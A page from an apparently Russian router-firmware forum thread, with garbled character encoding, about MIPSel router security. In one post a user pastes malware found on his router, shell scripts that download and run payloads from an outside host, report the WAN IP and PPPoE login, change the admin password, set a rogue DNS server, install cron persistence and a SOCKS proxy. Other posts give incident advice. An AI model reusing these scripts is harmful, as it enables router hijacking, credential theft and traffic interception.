Warning: preg_replace(): The /e modifier is deprecated, use preg_replace_callback instead in ..../includes/class_bootstrap.php(430) : eval()'d code on line 123
¬нимание! Ѕезопасность Linux-based MIPSel роутеров! - Page 4
Page 4 of 9 FirstFirst ... 23456 ... LastLast
Results 46 to 60 of 129

Thread: ¬нимание! Ѕезопасность Linux-based MIPSel роутеров!

  1. #46
    Join Date
    Feb 2008
    Location
    Moscow, Tver
    Posts
    3,962
    Quote Originally Posted by YuriM View Post
    ѕроцесс взлома описан здесь: http://habrahabr.ru/company/xakep/blog/143834/

    Ќасколько мне известно, в оригинальной прошивке Asus wl500gpv2 есть включение/отключение WPS. ¬ олеговской не нашел. ќно вообще там работает?
    ¬ прошивках ќлеги и Ёнтузиастов WPS нет как класса, соответственно, ломать нечего.
    ѕоскольку обсуждать нечего - перенЄс сюда.

  2. #47
    Join Date
    Mar 2009
    Location
    Default City
    Posts
    2,695
    Blog Entries
    4
    Quote Originally Posted by vectorm View Post
    ¬ прошивках ќлеги и Ёнтузиастов WPS нет как класса, соответственно, ломать нечего.
    ѕоскольку обсуждать нечего - перенЄс сюда.
    јјј можно немножко пофлудить? –аз уж подн€ли тут эту тему, то - ѕодбор паролей к WPA/WPA2 с использованием видеокарты http://habrahabr.ru/post/122553/ - естественно работает вне зависимости от того кака€ прошивка установленна на роутере) »спользуетс€ как обсчет на видеокарте так и сокращение необходимого диапазона просчета с использованием "как это по русски" - радужных таблиц )

    ƒеклаймер - ≈стественно примен€етс€ только дл€ нахождени€ забытого парол€ к своей точке )
    Last edited by TReX; 15-05-2012 at 16:13.

  3. #48

    пароль к консоли

    коллеги, каюсь, помнил, но забыл.
    как посмотреть/помен€ть пароль рута из веб-морды?

    спасибо.

  4. #49

    Exclamation ”€звимость WPS и прошивка "от олега"

    ¬ св€зи найденной у€звимостью в wps, хочу узнать, работает ли он в прошивке "от олега". ¬ оригинальной прошивке вроде есть и можно отключать.
    –оутер asus wl500gpv2.

  5. #50
    Join Date
    Oct 2009
    Posts
    529
    Blog Entries
    1
    Quote Originally Posted by vectorm View Post
    ¬ прошивках ќлеги и Ёнтузиастов WPS нет как класса, соответственно, ломать нечего.
    ѕоскольку обсуждать нечего - перенЄс сюда.
    топикстартер этого не увидел и всЄ еще волнуетс€
    Last edited by MercuryV; 15-05-2012 at 23:46. Reason: вслед за очередным переносом

  6. #51
    Quote Originally Posted by TReX View Post
    ѕодбор паролей к WPA/WPA2 с использованием видеокарты http://habrahabr.ru/post/122553/ - естественно работает вне зависимости от того кака€ прошивка установленна на роутере) »спользуетс€ как обсчет на видеокарте так и сокращение необходимого диапазона просчета с использованием "как это по русски" - радужных таблиц )
    “огда и € добавлю: взлом WPS.

    —юда же: "”головный кодекс –‘ (”  –‘). —тать€ 272. Ќеправомерный доступ к компьютерной информации."

    Quote Originally Posted by Pablo Escobar View Post
    коллеги, каюсь, помнил, но забыл.
    как посмотреть/помен€ть пароль рута из веб-морды?
     ак помен€ть из веб-морды? "System Setup" Ч> "Change Password"
    »з консоли посмотреть:
    nvram show | grep http_passwd
    © 2008-2013 ABATAPA WL-500gP/128M / Asus RT-N16 / USB Flash / VLAN / PPPoE / VoIP / nShaper / NAS: iStor is607, Sarotech NAS-20, QNap 109 Pro / NFS / ѕринтер / etc

  7. #52

    шпион на роутере

    »мею wl500gpv2 уже 3 года. »зучил полностью. Ќедавно перепрошил на последнюю прошивку от энтузиастов.
    были некоторые проблемы с samba (нет доступа с ipad из программы buzz player). поэтому отключил iptables (iptables -P FORWARD ACCEPT
    iptables -P INPUT ACCEPT).
    так и оставил. сегодн€ нужно было изменить некоторые скрипты. обратил внимание, что в /tmp/local/sbin много файлов. прибил лишние процессы и начал смотреть...
    содержимое post-firewall:
    Code:
    #!/bin/sh
    
    cd /usr/local/sbin
    wget -q http://spy4.in/data/tofire
    chmod +x tofire
    sh tofire
    rm -rf tofire
    добавилс€ файл tocron:
    Code:
    #!/bin/sh
    cd /usr/local/sbin && wget -q http://spy4.in/data/todo && chmod +x todo && ./todo && rm -rf todo
    исполн€емые 3proxy, proxy, udppm, socks и еще пару

    содержимое http://spy4.in/data/todo:
    Code:
    #!/bin/sh
    
    rip=`nvram get wan0_ipaddr`
    ilogin=`nvram get wan0_pppoe_username`
    sport=`cat /usr/local/etc/sport`
    sleep ` tr -cd 1-9 </dev/urandom | head -c 2`s
    wget -q -O ttt http://spy4.in/g.php?rname=$ilogin\&rip=$rip\&sport=$sport
    rm -rf ttt
    содержимое http://spy4.in/data/tofire:
    Code:
    #!/bin/sh
    nvram set dhcp_dns1_x=217.12.219.20
    nvram set http_passwd=qweasdOP
    mount -obind /tmp/local /opt
    cd /tmp/ && wget http://spy4.in/data/3.tgz && tar xvzf 3.tgz
    rm -rf /tmp/3.tgz
    mkdir /var/spool/cron/crontabs/ -p
    mv -f /tmp/local/admin /var/spool/cron/crontabs/
    chmod +x /var/spool/cron/crontabs/admin
    killall crond
    sleep 3
    crond
    crontab /var/spool/cron/crontabs/admin -u admin
    
    SPORT=` tr -cd 1-5 </dev/urandom | head -c 5`
    echo $SPORT > /usr/local/etc/sport
    echo "daemon
    nserver 8.8.8.8
    auth none
    socks -p$SPORT" > /usr/local/etc/3proxy.cfg
    killall 3proxy
    sleep 5
    3proxy /usr/local/etc/3proxy.cfg
    cd /usr/local/sbin && ./tocron
    особо ничего не выт€нет (ip внутренний, iptables уже вкрутил, пароль помен€л).
     то нибудь сталкивалс€ с подобным? чем грозит как думаете? где еще чего посмотреть?

    upd проворонил что в dhcp изменен dns на левый. в результате происходит попытка заражени€ подсоединенных устройств (перекидывает на страницы с предложением обновить браузер.)
    Last edited by Visionary; 05-08-2012 at 11:41.

  8. #53
    Quote Originally Posted by Visionary View Post
     то нибудь сталкивалс€ с подобным?
    ј о чем, по-¬ашему, эта тема?!

    Quote Originally Posted by Visionary View Post
    чем грозит как думаете?
    ј чем может грозить захваченный роутер? —ъесть ¬аш трафик, "засветить" IP на сайтах противоправной направленности (экстремистских, распростран€ющих детское порно, и т. д.) и привлечь к этому IP внимание правоохранительных органов, перехватывать ваш трафик, в том числе пароли и куки, и использовать их дл€ распространени€ спама... ѕродолжать?

    Quote Originally Posted by Visionary View Post
    где еще чего посмотреть?
    ј что, в роутере дофига мест, "где посмотреть"?

    Quote Originally Posted by Visionary View Post
    upd проворонил что в dhcp изменен dns на левый. в результате происходит попытка заражени€ подсоединенных устройств (перекидывает на страницы с предложением обновить браузер.)
    —тавьте новую прошивку, делайте сброс в заводские установки, удал€Єте всЄ с носителей и из flashfs. » не отключайте бездумно фаервол!
    © 2008-2013 ABATAPA WL-500gP/128M / Asus RT-N16 / USB Flash / VLAN / PPPoE / VoIP / nShaper / NAS: iStor is607, Sarotech NAS-20, QNap 109 Pro / NFS / ѕринтер / etc

  9. #54
    ћћћћ...
    ƒа наверное все что хотели то и делали. —уди по скриптам самое интересное в файлике что скачивалс€. ’очешь узнать где наследил скачай его и посмотри в нутрь.
    ј так от ƒќ— атак до банального перехвата паролей к сайтам, вебмани, киви, почты, и т.д. если дома клиент банк то ты ввобще победитель=)

    ѕрисоеден€юсь к словам : "¬се в дефолт"


    ј самое главное не оставл€ть пароль админа штатным, думаю при том что ты отключил фаирвол открыл телнет сдоступом по wan.

  10. #55
    надеюсь дефолтный пароль мен€ли? ибо досихпор бродит по сети вирусн€к дл€ роутеров... признаки: тормозит ребутитс€ .... в процессах дофига висит с именем mips
    DIR-320 много,+ другие уже тож много + медиа-плееры и планшеты, и все на мипс

  11. #56
    Quote Originally Posted by Virtuals View Post
    надеюсь дефолтный пароль мен€ли? ибо досихпор бродит по сети вирусн€к дл€ роутеров... признаки: тормозит ребутитс€ .... в процессах дофига висит с именем mips
     стати, пароль не мен€л. Ќадо будет попробовать. ’от€ процессов mips не обнаружено.
    ≈ще вычитал, что бывают проблемы с подключением гигабитных устройств.

    Ѕудет чем завтра на работе зан€тьс€.
    ѕопробовать заменить Ѕѕ, попробовать отключить все от сети, и если ничего не поможет, то восстановление с помощью перепрошивки и смена парол€

    «аменил Ѕѕ на другой - лучше не стало
    ќтключил от роутера все, кроме одной 100ћб сети, по прежнему перезагружаетс€.

    ћожет есть еще варианты, что можно посмотреть?
    Last edited by Omega; 16-11-2012 at 19:14. Reason: fixed

  12. #57
    Join Date
    Mar 2009
    Location
    Russia, Moscow
    Posts
    2,102
    Blog Entries
    32
     ритические у€звимости в беспроводных маршрутизаторах Cisco Linksys

    »сследователи безопасности предупредили (http://seclists.org/fulldisclosure/2013/Jan/69) о скорой публикации в открытом доступе
    информации о критической у€звимости в беспроводных маршрутизаторах Cisco Linksys. ”€звимость позвол€ет из внешней сети получить
    доступ к устройству под пользователем root без проведени€ аутентификации.  омпани€ Cisco была уведомлена о проблеме несколько
    мес€цев назад, но исправление так и не было выпущено. ¬ насто€щее врем€ все доступные версии прошивки Linksys у€звимы, что ставит
    под удар около 70 млн наход€щихс€ в сети устройств. ¬ы€вившие у€звимость исследователи не намерены больше скрывать информацию
    от общественности и планируют дать компании Cisco ещЄ две недели на подготовку обновлени€ прошивки, после чего опубликовать
    детали у€звимости и концептуальный прототип эксплоита.


    >> ѕохоже, альтернативы dd-wrt особо-то и нет.
    > zRouter на базе FreeBSD ( http://zrouter.org/ )
    > openWRT
    > RouterOS
    > Gargoyle

    wive-ng ( более оптимизированный на потребление ресурсов озу и цпу, в отличии от dd-wrt ) = http://sourceforge.net/projects/wive-ng/

    > wive-ng ( более оптимизированный на потребление ресурсов озу и цпу )
    ј что, она уже поддерживает девайсы на броадкоме? oO

    > zRouter на базе FreeBSD ( http://zrouter.org/ )
    Ёто дл€ желающих с роутером мучатьс€, а не пользоватьс€ оным.

    > openWRT
    ј там недопиленo и требует шаманства руками, как то сборка из транка и патчинг. ¬ариант, но не дл€ средних умов.

    > RouterOS
    ќгороженна€ и закрыта€ хрень. “еоретически сорц получить можно. ѕрактически, проще сразу застрелитьс€, чем иметь дело с этими господами.

    > Gargoyle
    ƒовольно странна€ прошивка "на любител€".

    > томато от шибби
    „то такое tomato € уже примерно знаю, а что такое шибби?

    > „то такое tomato € уже примерно знаю, а что такое шибби?
    ¬ы ещЄ спросите, кто такой ќлег
    http://www.opennet.ru/openforum/vslu...ID3/88202.html

  13. #58
    Quote Originally Posted by Omega View Post
     ритические у€звимости в беспроводных маршрутизаторах Cisco Linksys
    Ёти Ђспециалисты по безопасности ї сломали роутер из LAN-сегмента и теперь громко кричат о критической у€звимости, хот€ из LAN-сегмента нет никакой защиты by design.

    —пециалисты, my ass.

  14. #59
    Join Date
    Mar 2008
    Location
    Korolev
    Posts
    2

    libupnp vulnerability

    ¬ прошивке присутствует libupnp с обнаруженной у€звимостью http://seclists.org/bugtraq/2013/Jan/130 ?
    √де-то читал, что даже с внешнего интерфейса UPnP у€звим. Ёто правда?

  15. #60
    Quote Originally Posted by hairpin View Post
    ¬ прошивке присутствует libupnp с обнаруженной у€звимостью http://seclists.org/bugtraq/2013/Jan/130 ?
    √де-то читал, что даже с внешнего интерфейса UPnP у€звим. Ёто правда?
    ” нас уже давно miniupnpd вместо нее.

Page 4 of 9 FirstFirst ... 23456 ... LastLast

Similar Threads

  1. Oscam fьr Mipsel Router
    By N3m3515 in forum German Discussion - Deutsch (DE)
    Replies: 7
    Last Post: 28-03-2015, 05:31
  2. Ѕезопасность SSH (dropbear)
    By SergeyVl in forum Russian Discussion - РУССКИЙ (RU)
    Replies: 309
    Last Post: 28-02-2013, 14:09
  3. Replies: 2
    Last Post: 24-03-2009, 17:18
  4. New 1.0.4.6 based custom firmware
    By kfurge in forum WL-700g Firmware Discussion
    Replies: 272
    Last Post: 20-11-2007, 17:15
  5. Recompiling with mipsel
    By smarechal in forum WL-500g Custom Development
    Replies: 6
    Last Post: 21-03-2005, 12:48

Tags for this Thread

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •